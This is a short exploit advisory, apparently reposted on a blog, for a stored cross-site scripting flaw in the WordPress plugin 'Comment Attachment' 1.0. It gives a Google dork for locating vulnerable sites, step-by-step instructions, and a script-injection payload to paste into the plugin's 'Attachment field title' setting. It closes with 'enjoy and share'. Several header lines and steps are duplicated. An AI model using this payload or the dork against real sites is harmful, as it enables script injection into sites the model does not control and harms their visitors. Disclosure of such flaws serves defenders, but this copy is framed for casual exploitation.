WordPress Comment Attachment 1.0 Cross Site Scripting Vulnerability
Exploit Title: WordPress Comment Attachment 1.0 Cross Site Scripting
Software Link: http://wordpress.org/plugins/comment-attachment/
Version : 1.0
Tested on: Linux & Windows
Category: webapps
Google Dork : inurl:”/comment-attachment/comment-attachment.php”
Software Link: http://wordpress.org/plugins/comment-attachment/
Version : 1.0
Tested on: Linux & Windows
Category: webapps
Google Dork : inurl:”/comment-attachment/comment-attachment.php”
Exploit :
[-] Description :
1) Download “Comment Attachment” And Install
2) Go To Setting Comment Attachment :
Settings > Discussion > Comment Attachment
3) Insert In “Attachment field title” This Code And Save :
1) Download “Comment Attachment” And Install
2) Go To Setting Comment Attachment :
Settings > Discussion > Comment Attachment
3) Insert In “Attachment field title” This Code And Save :
“><script>alert(/Arsan/)</script>
4) And Try To See Your Post And Comment; Follow Link :
http://localhost/wp/?p=1
enjoy and share :) VIRUS VOLT
0 comments:
Post a Comment